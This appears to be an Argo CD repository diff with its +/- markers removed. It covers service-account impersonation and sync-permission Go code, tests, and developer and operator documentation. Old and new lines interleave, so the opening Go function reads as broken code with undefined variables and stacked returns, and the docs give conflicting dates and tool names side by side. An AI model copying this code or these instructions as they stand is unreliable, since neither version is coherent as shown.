return fmt.Errorf("failed to get API resource info for %s/%s: unable to verify permissions", un.GroupVersionKind().Group, un.GroupVersionKind().Kind)
// deriveServiceAccountToImpersonate determines the service account to be used for impersonation for the sync operation.
// The returned service account will be fully qualified including namespace and the service account name in the format system:serviceaccount:<namespace>:<service_account>
func deriveServiceAccountToImpersonate(project *v1alpha1.AppProject, application *v1alpha1.Application, destCluster *v1alpha1.Cluster) (string, error) {
// spec.Destination.Namespace is optional. If not specified, use the Application's
// namespace
serviceAccountNamespace := application.Spec.Destination.Namespace
if serviceAccountNamespace == "" {
serviceAccountNamespace = application.Namespace
}
if !project.IsGroupKindNamePermitted(un.GroupVersionKind().GroupKind(), un.GetName(), res.Namespaced) {
return fmt.Errorf("resource %s:%s is not permitted in project %s", un.GroupVersionKind().Group, un.GroupVersionKind().Kind, project.Name)
}
if res.Namespaced {
permitted, err := project.IsDestinationPermitted(destCluster, un.GetNamespace(), getProjectClusters)
// Loop through the destinationServiceAccounts and see if there is any destination that is a candidate.
// if so, return the service account specified for that destination.
for _, item := range project.Spec.DestinationServiceAccounts {
dstServerMatched, err := glob.MatchWithError(item.Server, destCluster.Server)
if err != nil {
return err
return "", fmt.Errorf("invalid glob pattern for destination server: %w", err)
}
if !permitted {
return fmt.Errorf("namespace %v is not permitted in project '%s'", un.GetNamespace(), project.Name)
dstNamespaceMatched, err := glob.MatchWithError(item.Namespace, application.Spec.Destination.Namespace)
if err != nil {
return "", fmt.Errorf("invalid glob pattern for destination namespace: %w", err)
}
if dstServerMatched && dstNamespaceMatched {
if strings.Trim(item.DefaultServiceAccount, " ") == "" || strings.ContainsAny(item.DefaultServiceAccount, serviceAccountDisallowedCharSet) {
return "", fmt.Errorf("default service account contains invalid chars '%s'", item.DefaultServiceAccount)
} else if strings.Contains(item.DefaultServiceAccount, ":") {
// service account is specified along with its namespace.
return "system:serviceaccount:" + item.DefaultServiceAccount, nil
}
// service account needs to be prefixed with a namespace
return fmt.Sprintf("system:serviceaccount:%s:%s", serviceAccountNamespace, item.DefaultServiceAccount), nil
}
}
return nil
// if there is no match found in the AppProject.Spec.DestinationServiceAccounts, use the default service account of the destination namespace.
return "", fmt.Errorf("no matching service account found for destination server %s and namespace %s", application.Spec.Destination.Server, serviceAccountNamespace)
}

View File

@@ -13,7 +13,6 @@ import (
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/runtime/schema"
"github.com/argoproj/argo-cd/v3/common"
"github.com/argoproj/argo-cd/v3/controller/testdata"
@@ -22,7 +21,6 @@ import (
"github.com/argoproj/argo-cd/v3/test"
"github.com/argoproj/argo-cd/v3/util/argo/diff"
"github.com/argoproj/argo-cd/v3/util/argo/normalizers"
"github.com/argoproj/argo-cd/v3/util/settings"
)
func TestPersistRevisionHistory(t *testing.T) {
@@ -727,7 +725,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
assert.Equal(t, expectedSA, sa)
// then, there should be an error saying no valid match was found
@@ -751,7 +749,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should be no error and should use the right service account for impersonation
require.NoError(t, err)
@@ -790,7 +788,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should be no error and should use the right service account for impersonation
require.NoError(t, err)
@@ -829,7 +827,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should be no error and it should use the first matching service account for impersonation
require.NoError(t, err)
@@ -863,7 +861,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should not be any error and should use the first matching glob pattern service account for impersonation
require.NoError(t, err)
@@ -898,7 +896,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should be an error saying no match was found
require.EqualError(t, err, expectedErrMsg)
@@ -926,7 +924,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should not be any error and the service account configured for with empty namespace should be used.
require.NoError(t, err)
@@ -960,7 +958,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should not be any error and the catch all service account should be returned
require.NoError(t, err)
@@ -984,7 +982,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there must be an error as the glob pattern is invalid.
require.ErrorContains(t, err, "invalid glob pattern for destination namespace")
@@ -1018,7 +1016,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
assert.Equal(t, expectedSA, sa)
// then, there should not be any error and the service account with its namespace should be returned.
@@ -1046,7 +1044,7 @@ func TestDeriveServiceAccountMatchingNamespaces(t *testing.T) {
f.application.Spec.Destination.Name = f.cluster.Name
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
assert.Equal(t, expectedSA, sa)
// then, there should not be any error and the service account with its namespace should be returned.
@@ -1129,7 +1127,7 @@ func TestDeriveServiceAccountMatchingServers(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should not be any error and the right service account must be returned.
require.NoError(t, err)
@@ -1168,7 +1166,7 @@ func TestDeriveServiceAccountMatchingServers(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should not be any error and first matching service account should be used
require.NoError(t, err)
@@ -1202,7 +1200,7 @@ func TestDeriveServiceAccountMatchingServers(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
assert.Equal(t, expectedSA, sa)
// then, there should not be any error and the service account of the glob pattern, being the first match should be returned.
@@ -1237,7 +1235,7 @@ func TestDeriveServiceAccountMatchingServers(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, &v1alpha1.Cluster{Server: destinationServerURL})
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, &v1alpha1.Cluster{Server: destinationServerURL})
// then, there an error with appropriate message must be returned
require.EqualError(t, err, expectedErr)
@@ -1271,7 +1269,7 @@ func TestDeriveServiceAccountMatchingServers(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there should not be any error and the service account of the glob pattern match must be returned.
require.NoError(t, err)
@@ -1295,7 +1293,7 @@ func TestDeriveServiceAccountMatchingServers(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
// then, there must be an error as the glob pattern is invalid.
require.ErrorContains(t, err, "invalid glob pattern for destination server")
@@ -1329,7 +1327,7 @@ func TestDeriveServiceAccountMatchingServers(t *testing.T) {
f := setup(destinationServiceAccounts, destinationNamespace, destinationServerURL, applicationNamespace)
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, &v1alpha1.Cluster{Server: destinationServerURL})
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, &v1alpha1.Cluster{Server: destinationServerURL})
// then, there should not be any error and the service account with the given namespace prefix must be returned.
require.NoError(t, err)
@@ -1357,7 +1355,7 @@ func TestDeriveServiceAccountMatchingServers(t *testing.T) {
f.application.Spec.Destination.Name = f.cluster.Name
// when
sa, err := settings.DeriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
sa, err := deriveServiceAccountToImpersonate(f.project, f.application, f.cluster)
assert.Equal(t, expectedSA, sa)
// then, there should not be any error and the service account with its namespace should be returned.
@@ -1655,116 +1653,3 @@ func dig(obj any, path ...any) any {
return i
}
func TestValidateSyncPermissions(t *testing.T) {
t.Parallel()
newResource := func(group, kind, name, namespace string) *unstructured.Unstructured {
obj := &unstructured.Unstructured{}
obj.SetGroupVersionKind(schema.GroupVersionKind{Group: group, Version: "v1", Kind: kind})
obj.SetName(name)
obj.SetNamespace(namespace)
return obj
}
project := &v1alpha1.AppProject{
ObjectMeta: metav1.ObjectMeta{
Name: "test-project",
Namespace: "argocd",
},
Spec: v1alpha1.AppProjectSpec{
Destinations: []v1alpha1.ApplicationDestination{
{Namespace: "default", Server: "*"},
},
},
}
destCluster := &v1alpha1.Cluster{
Server: "https://kubernetes.default.svc",
}
noopGetClusters := func(_ string) ([]*v1alpha1.Cluster, error) {
return nil, nil
}
t.Run("nil APIResource returns error", func(t *testing.T) {
t.Parallel()
un := newResource("apps", "Deployment", "my-deploy", "default")
err := validateSyncPermissions(project, destCluster, noopGetClusters, un, nil)
require.Error(t, err)
assert.Contains(t, err.Error(), "failed to get API resource info for apps/Deployment")
assert.Contains(t, err.Error(), "unable to verify permissions")
})
t.Run("permitted namespaced resource returns no error", func(t *testing.T) {
t.Parallel()
un := newResource("", "ConfigMap", "my-cm", "default")
res := &metav1.APIResource{Name: "configmaps", Namespaced: true}
err := validateSyncPermissions(project, destCluster, noopGetClusters, un, res)
assert.NoError(t, err)
})
t.Run("group kind not permitted returns error", func(t *testing.T) {
t.Parallel()
projectWithDenyList := &v1alpha1.AppProject{
ObjectMeta: metav1.ObjectMeta{
Name: "restricted-project",
Namespace: "argocd",
},
Spec: v1alpha1.AppProjectSpec{
Destinations: []v1alpha1.ApplicationDestination{
{Namespace: "*", Server: "*"},
},
ClusterResourceBlacklist: []v1alpha1.ClusterResourceRestrictionItem{
{Group: "rbac.authorization.k8s.io", Kind: "ClusterRole"},
},
},
}
un := newResource("rbac.authorization.k8s.io", "ClusterRole", "my-role", "")
res := &metav1.APIResource{Name: "clusterroles", Namespaced: false}
err := validateSyncPermissions(projectWithDenyList, destCluster, noopGetClusters, un, res)
require.Error(t, err)
assert.Contains(t, err.Error(), "is not permitted in project")
})
t.Run("namespace not permitted returns error", func(t *testing.T) {
t.Parallel()
un := newResource("", "ConfigMap", "my-cm", "kube-system")
res := &metav1.APIResource{Name: "configmaps", Namespaced: true}
err := validateSyncPermissions(project, destCluster, noopGetClusters, un, res)
require.Error(t, err)
assert.Contains(t, err.Error(), "namespace kube-system is not permitted in project")
})
t.Run("cluster-scoped resource skips namespace check", func(t *testing.T) {
t.Parallel()
projectWithClusterResources := &v1alpha1.AppProject{
ObjectMeta: metav1.ObjectMeta{
Name: "test-project",
Namespace: "argocd",
},
Spec: v1alpha1.AppProjectSpec{
Destinations: []v1alpha1.ApplicationDestination{
{Namespace: "default", Server: "*"},
},
ClusterResourceWhitelist: []v1alpha1.ClusterResourceRestrictionItem{
{Group: "*", Kind: "*"},
},
},
}
un := newResource("", "Namespace", "my-ns", "")
res := &metav1.APIResource{Name: "namespaces", Namespaced: false}
err := validateSyncPermissions(projectWithClusterResources, destCluster, noopGetClusters, un, res)
assert.NoError(t, err)
})
}

Binary file not shown.

Before

Width:  |  Height:  |  Size: 23 MiB

After

Width:  |  Height:  |  Size: 3.0 MiB

View File

@@ -38,23 +38,23 @@ and others. Although you can make changes to these files and run them locally, i
1. Fork and clone the [Argo UI repository](https://github.com/argoproj/argo-ui).
2. `cd` into your `argo-ui` directory, and then run `pnpm install`.
2. `cd` into your `argo-ui` directory, and then run `yarn install`.
3. Make your file changes.
4. Run `pnpm start` to start a [storybook](https://storybook.js.org/) dev server and view the components in your browser. Make sure all your changes work as expected.
4. Run `yarn start` to start a [storybook](https://storybook.js.org/) dev server and view the components in your browser. Make sure all your changes work as expected.
5. Use [pnpm link](https://pnpm.io/cli/link) to link Argo UI package to your Argo CD repository. (Commands below assume that `argo-ui` and `argo-cd` are both located within the same parent folder)
5. Use [yarn link](https://classic.yarnpkg.com/en/docs/cli/link/) to link Argo UI package to your Argo CD repository. (Commands below assume that `argo-ui` and `argo-cd` are both located within the same parent folder)
* `cd argo-ui`
* `pnpm link`
* `yarn link`
* `cd ../argo-cd/ui`
* `pnpm link argo-ui`
* `yarn link argo-ui`
Once the `argo-ui` package has been successfully linked, test changes in your local development environment.
6. Commit changes and open a PR to [Argo UI](https://github.com/argoproj/argo-ui).
7. Once your PR has been merged in Argo UI, `cd` into your `argo-cd/ui` folder and run `pnpm add git+https://github.com/argoproj/argo-ui.git`. This will update the commit SHA in the `ui/pnpm-lock.yaml` file to use the latest master commit for argo-ui.
7. Once your PR has been merged in Argo UI, `cd` into your `argo-cd/ui` folder and run `yarn add git+https://github.com/argoproj/argo-ui.git`. This will update the commit SHA in the `ui/yarn.lock` file to use the latest master commit for argo-ui.
8. Submit changes to `ui/pnpm-lock.yaml` in a PR to Argo CD.
8. Submit changes to `ui/yarn.lock`in a PR to Argo CD.

View File

@@ -60,7 +60,7 @@ The Linter might make some automatic changes to your code, such as indentation f
* Finally, after the Linter reports no errors, run `git status` or `git diff` to check for any changes made automatically by Lint
* If there were automatic changes, commit them to your local branch
If you touched UI code, you should also run the linter on it:
If you touched UI code, you should also run the Yarn linter on it:
* Run `make lint-ui` or `make lint-ui-local`
* Fix any of the errors reported by it

View File

@@ -21,8 +21,8 @@ These are the upcoming releases dates:
| v3.1 | Monday, Jun. 16, 2025 | Monday, Aug. 4, 2025 | [Christian Hernandez](https://github.com/christianh814) | [Alexandre Gaudreault](https://github.com/agaudreault) | [checklist](https://github.com/argoproj/argo-cd/issues/23347) |
| v3.2 | Monday, Sep. 15, 2025 | Monday, Nov. 3, 2025 | [Nitish Kumar](https://github.com/nitishfy) | [Michael Crenshaw](https://github.com/crenshaw-dev) | [checklist](https://github.com/argoproj/argo-cd/issues/24539) |
| v3.3 | Monday, Dec. 15, 2025 | Monday, Feb. 2, 2026 | [Peter Jiang](https://github.com/pjiang-dev) | [Regina Voloshin](https://github.com/reggie-k) | [checklist](https://github.com/argoproj/argo-cd/issues/25211) |
| v3.4 | Monday, Mar. 16, 2026 | Tuesday, May. 5, 2026 | [Codey Jenkins](https://github.com/FourFifthsCode) | [Regina Voloshin](https://github.com/reggie-k) | [checklist](https://github.com/argoproj/argo-cd/issues/26527) |
| v3.5 | Tuesday, Jun. 16, 2026 | Tuesday, Aug. 4, 2026 | [Patroklos Papapetrou](https://github.com/ppapapetrou76) | [Regina Voloshin](https://github.com/reggie-k) | [checklist](https://github.com/argoproj/argo-cd/issues/26746) |
| v3.4 | Monday, Mar. 16, 2026 | Monday, May. 4, 2026 | [Codey Jenkins](https://github.com/FourFifthsCode) | [Regina Voloshin](https://github.com/reggie-k) | [checklist](https://github.com/argoproj/argo-cd/issues/26527) |
| v3.5 | Monday, Jun. 15, 2026 | Monday, Aug. 3, 2026 | [Patroklos Papapetrou](https://github.com/ppapapetrou76) | [Regina Voloshin](https://github.com/reggie-k) | [checklist](https://github.com/argoproj/argo-cd/issues/26746) |
Actual release dates might differ from the plan by a few days.
@@ -36,10 +36,10 @@ effectively means that there is a seven-week feature freeze.
These are the approximate release dates:
* The first Tuesday of February
* The first Tuesday of May
* The first Tuesday of August
* The first Tuesday of November
* The first Monday of February
* The first Monday of May
* The first Monday of August
* The first Monday of November
Dates may be shifted slightly to accommodate holidays. Those shifts should be minimal.

View File

@@ -98,15 +98,11 @@ checks to see if the release came out correctly:
### If something went wrong
A new Argo CD release results in:
- A new GitHub release created
- Stable Git tag pointing to the release (if the release is the latest release)
- The release Go packages are published for using Argo CD code as dependency
- Docker images and SBOM artifacts are published
If something went wrong, damage should be limited. Depending on the steps that
have been performed, you will need to manually clean up.
Because of all the above dependencies, in a case of a release that failed, it is not safe to delete and recreate it.
Instead, create the next patch release (for example, if `3.2.4` failed, create `3.2.5` after fixing the problem, but don't recreate `3.2.4`).
Upon successful publishing of the fixed release (3.2.5 in our example), copy the full release notes manually from the failed release (3.2.4 in our example) and then update the failed release (3.2.4 in our example) release notes to state this release is invalid and should not be used.
* If the container image has been pushed to Quay.io, delete it
* Delete the release (if created) from the `Releases` page on GitHub
### Manual releasing

View File

@@ -1,8 +1,7 @@
# Submitting PRs
## Prerequisites
1. [Development Environment](development-environment.md)
1. [Development Environment](development-environment.md)
2. [Toolchain Guide](toolchain-guide.md)
3. [Development Cycle](development-cycle.md)
@@ -22,10 +21,10 @@ If you need guidance with submitting a PR, or have any other questions regarding
## Before Submitting a PR
1. Rebase your branch against upstream master:
1. Rebase your branch against upstream main:
```shell
git fetch upstream
git rebase upstream/master
git rebase upstream/main
```
2. Run pre-commit checks:

View File

@@ -45,7 +45,7 @@ The Makefile's `start-e2e` target starts instances of ArgoCD on your local machi
- `ARGOCD_E2E_REPOSERVER_PORT`: Listener port for `argocd-reposerver` (default: `8081`)
- `ARGOCD_E2E_DEX_PORT`: Listener port for `dex` (default: `5556`)
- `ARGOCD_E2E_REDIS_PORT`: Listener port for `redis` (default: `6379`)
- `ARGOCD_E2E_PNPM_CMD`: Command to use for starting the UI via pnpm (default: `pnpm`)
- `ARGOCD_E2E_YARN_CMD`: Command to use for starting the UI via Yarn (default: `yarn`)
- `ARGOCD_E2E_DIR`: Local path to the repository to use for ephemeral test data
If you have changed the port for `argocd-server`, be sure to also set `ARGOCD_SERVER` environment variable to point to that port, e.g. `export ARGOCD_SERVER=localhost:8888` before running `make test-e2e` so that the test will communicate to the correct server component.

View File

@@ -117,9 +117,9 @@ you should edit your `~/.kube/config` and modify the `server` option to point to
<https://nodejs.org/en/download>
#### Install `pnpm`
#### Install `yarn`
<https://pnpm.io/installation>
<https://classic.yarnpkg.com/lang/en/docs/install/>
#### Install `goreman`
@@ -130,7 +130,7 @@ Goreman is used to start all needed processes to get a working Argo CD developme
#### Install required dependencies and build-tools
> [!NOTE]
> The installation instructions are valid for Linux hosts only. Mac instructions will follow shortly.
> The installations instructions are valid for Linux hosts only. Mac instructions will follow shortly.
For installing the tools required to build and test Argo CD on your local system, we provide convenient installer scripts. By default, they will install binaries to `/usr/local/bin` on your system, which might require `root` privileges.

View File

@@ -83,26 +83,6 @@ or a randomly generated password stored in a secret (Argo CD 1.9 and later).
Add `admin.enabled: "false"` to the `argocd-cm` ConfigMap
(see [user management](./operator-manual/user-management/index.md)).
## How to view orphaned resources?
Orphaned Kubernetes resources are top-level namespaced resources that do not belong to any Argo CD Application. For more information, see [Orphaned Resources Monitoring](./user-guide/orphaned-resources.md).
!!! warning
Enabling orphaned resource monitoring has performance implications. If an AppProject monitors a namespace containing many resources not managed by Argo CD (e.g. `kube-system`), it can significantly impact your Argo CD instance. Enable this feature only on projects with well-scoped namespaces.
To view orphaned resources in the Argo CD UI:
1. Click on **Settings** in the sidebar.
2. Click on **Projects**.
3. Select the desired project.
4. Scroll down to the **RESOURCE MONITORING** section.
5. Click **Edit** and enable the monitoring feature.
6. Check **Enable application warning conditions?** to enable warnings.
7. Click **Save**.
8. Navigate back to **Applications** and select an application under the configured project.
9. In the **Sync Panel**, under **APP CONDITIONS**, you will see the orphaned resources warning.
10. Click **Show Orphaned** below the **HEALTH STATUS** filters to display orphaned resources.
## Argo CD cannot deploy Helm Chart based applications without internet access, how can I solve it?
Argo CD might fail to generate Helm chart manifests if the chart has dependencies located in external repositories. To

View File

@@ -30,7 +30,7 @@ Impersonation requests first authenticate as the requesting user, then switch to
### Feature scope
Impersonation is supported for the lifecycle of objects managed by an Application directly, which includes sync operations (creation, update and pruning of resources) and deletion as part of Application finalizer logic. It is also supported for UI operations triggered by the user.
Impersonation is currently only supported for the lifecycle of objects managed by an Application directly, which includes sync operations (creation, update and pruning of resources) and deletion as part of Application finalizer logic. This *does not* includes operations triggered via ArgoCD's UI, which will still be executed with Argo CD's control-plane service account.
## Prerequisites

View File

@@ -230,7 +230,7 @@ p, somerole, applicationsets, get, foo/bar/*, allow
### Using the CLI
You can use all existing Argo CD CLI commands for managing ApplicationSets in other namespaces, exactly as you would use the CLI to manage ApplicationSets in the control plane's namespace.
You can use all existing Argo CD CLI commands for managing applications in other namespaces, exactly as you would use the CLI to manage applications in the control plane's namespace.
For example, to retrieve the `ApplicationSet` named `foo` in the namespace `bar`, you can use the following CLI command:

View File

@@ -14,7 +14,7 @@ The Progressive Syncs feature set is intended to be light and flexible. The feat
- Progressive Syncs watch for the managed Application resources to become "Healthy" before proceeding to the next stage.
- Deployments, DaemonSets, StatefulSets, and [Argo Rollouts](https://argoproj.github.io/argo-rollouts/) are all supported, because the Application enters a "Progressing" state while pods are being rolled out. In fact, any resource with a health check that can report a "Progressing" status is supported.
- [Argo CD Resource Hooks](../../user-guide/sync-waves.md) are supported. We recommend this approach for users that need advanced functionality when an Argo Rollout cannot be used, such as smoke testing after a DaemonSet change.
- [Argo CD Resource Hooks](../../user-guide/resource_hooks.md) are supported. We recommend this approach for users that need advanced functionality when an Argo Rollout cannot be used, such as smoke testing after a DaemonSet change.
## Enabling Progressive Syncs

View File

@@ -150,8 +150,6 @@ data:
server.api.content.types: "application/json"
# Number of webhook requests processed concurrently (default 50)
server.webhook.parallelism.limit: "50"
# Maximum number of compiled glob patterns to cache for RBAC evaluation (default 10000)
server.glob.cache.size: "10000"
# Whether to allow sync with replace checked to go through. Resource-level annotation to replace override this setting, i.e. it's only enforced on the API server level.
server.sync.replace.allowed: "true"

View File

@@ -253,11 +253,6 @@ spec:
megabytes.
The default value is 200. You might need to increase this for an Argo CD instance that manages 3000+ applications.
* The `server.glob.cache.size` config key in `argocd-cmd-params-cm` (or the `--glob-cache-size` server flag) controls
the maximum number of compiled glob patterns cached for RBAC policy evaluation. Glob pattern compilation is expensive,
and caching significantly improves RBAC performance when many applications are managed. The default value is 10000.
See [RBAC Glob Matching](rbac.md#glob-matching) for more details.
### argocd-dex-server, argocd-redis
The `argocd-dex-server` uses an in-memory database, and two or more instances may have inconsistent data.
@@ -438,55 +433,6 @@ spec:
> paths
> provided in the annotation. The application path serves as the deepest path that can be selected as the root.
#### Measuring Annotation Efficiency
You can use the following metrics to evaluate how effectively the `argocd.argoproj.io/manifest-generate-paths`
annotation is reducing unnecessary manifest regeneration:
- **`argocd_webhook_requests_total`** (label: `repo`) — counts incoming webhook events per repository. Use this as the
baseline for how many push events Argo CD is receiving.
- **`argocd_webhook_store_cache_attempts_total`** (labels: `repo`, `successful`) — counts attempts to reuse the previously
cached manifests for the new commit SHA when an application's refresh paths have _not_ changed. A `successful=true`
result means the cache was warmed for the new revision without re-generating manifests, which is the desired outcome.
To assess efficiency, compare the rate of `successful=true` attempts against the total webhook rate. A high ratio
indicates the annotation is working well and preventing unnecessary manifest regeneration.
Note that some `successful=false` results are expected and not a cause for concern — they occur when Argo CD has not
yet cached manifests for an application (e.g. after a restart or first sync), so there is nothing to carry forward to
the new revision.
#### Disabling Manifest Cache Warming in Webhooks
In some cases, the manifest cache warming done by the webhook handler can hurt performance rather than help it:
- **Plain YAML repositories**: if applications use plain YAML manifests (no Helm or Kustomize rendering), manifest
generation is fast and caching provides little benefit. Attempting to warm the cache for thousands of unaffected
applications on every commit adds significant overhead.
- **Large monorepos**: with many applications sharing a single repository, each webhook event triggers a cache warm
attempt for every application whose paths did not change. With thousands of applications, this can cause the webhook
handler to spend significant time on Redis operations, delaying the actual reconciliation trigger for the affected
application.
When disabled, the webhook handler will only trigger reconciliation for applications whose files have changed and
will skip all Redis cache operations for unaffected applications. This is the recommended setting for large monorepos
with plain YAML manifests.
**Per-repository setting (recommended)**: set `webhookManifestCacheWarmDisabled: true` on the repository via the
ArgoCD CLI or UI:
```bash
argocd repo edit https://github.com/org/repo.git --webhook-manifest-cache-warm-disabled
```
**Global setting**: to disable cache warming for all repositories, set the following environment variable on
`argocd-server`:
```
ARGOCD_WEBHOOK_MANIFEST_CACHE_WARM_DISABLED=true
```
### Application Sync Timeout & Jitter
Argo CD has a timeout for application syncs. It will trigger a refresh for each application periodically when the

View File

@@ -199,7 +199,7 @@ The example below will expose the Argo CD Application labels `team-name` and `en
In this case, the metric would look like:
```
# TYPE argocd_cluster_labels gauge
# TYPE argocd_app_labels gauge
argocd_cluster_labels{label_environment="dev",label_team_name="team1",name="cluster1",server="server1"} 1
argocd_cluster_labels{label_environment="staging",label_team_name="team2",name="cluster2",server="server2"} 1
argocd_cluster_labels{label_environment="production",label_team_name="team3",name="cluster3",server="server3"} 1

View File

@@ -321,10 +321,6 @@ When the `example-user` executes the `extensions/DaemonSet/test` action, the fol
3. The value `action/extensions/DaemonSet/test` matches `action/extensions/*`. Note that `/` is not treated as a separator and the use of `**` is not necessary.
4. The value `default/my-app` matches `default/*`.
> [!TIP]
> For performance tuning of glob pattern matching, see the `server.glob.cache.size` config key in
> [High Availability - argocd-server](high_availability.md#argocd-server).
## Using SSO Users/Groups
The `scopes` field controls which OIDC scopes to examine during RBAC enforcement (in addition to `sub` scope).

View File

@@ -6,7 +6,6 @@
- [apps/StatefulSet/restart](https://github.com/argoproj/argo-cd/blob/master/resource_customizations/apps/StatefulSet/actions/restart/action.lua)
- [apps/StatefulSet/scale](https://github.com/argoproj/argo-cd/blob/master/resource_customizations/apps/StatefulSet/actions/scale/action.lua)
- [argoproj.io/AnalysisRun/terminate](https://github.com/argoproj/argo-cd/blob/master/resource_customizations/argoproj.io/AnalysisRun/actions/terminate/action.lua)
- [argoproj.io/Application/toggle-auto-sync](https://github.com/argoproj/argo-cd/blob/master/resource_customizations/argoproj.io/Application/actions/toggle-auto-sync/action.lua)
- [argoproj.io/CronWorkflow/create-workflow](https://github.com/argoproj/argo-cd/blob/master/resource_customizations/argoproj.io/CronWorkflow/actions/create-workflow/action.lua)
- [argoproj.io/Rollout/abort](https://github.com/argoproj/argo-cd/blob/master/resource_customizations/argoproj.io/Rollout/actions/abort/action.lua)
- [argoproj.io/Rollout/pause](https://github.com/argoproj/argo-cd/blob/master/resource_customizations/argoproj.io/Rollout/actions/pause/action.lua)

View File

@@ -22,7 +22,6 @@ argocd-applicationset-controller [flags]
--client-certificate string Path to a client certificate file for TLS
--client-key string Path to a client key file for TLS
--cluster string The name of the kubeconfig cluster to use
--concurrent-application-updates int Number of concurrent Application create/update/delete operations per ApplicationSet reconcile. (default 1)
--concurrent-reconciliations int Max concurrent reconciliations limit for the controller (default 10)
--context string The name of the kubeconfig context to use
--debug Print debug logs. Takes precedence over loglevel

View File

@@ -54,7 +54,6 @@ argocd-server [flags]
--enable-gzip Enable GZIP compression (default true)
--enable-k8s-event none Enable ArgoCD to use k8s event. For disabling all events, set the value as none. (e.g --enable-k8s-event=none), For enabling specific events, set the value as `event reason`. (e.g --enable-k8s-event=StatusRefreshed,ResourceCreated) (default [all])
--enable-proxy-extension Enable Proxy Extension feature
--glob-cache-size int Maximum number of compiled glob patterns to cache for RBAC evaluation (default 10000)
--gloglevel int Set the glog logging level
-h, --help help for argocd-server
--hydrator-enabled Feature flag to enable Hydrator. Default ("false")

View File

@@ -1,7 +1,7 @@
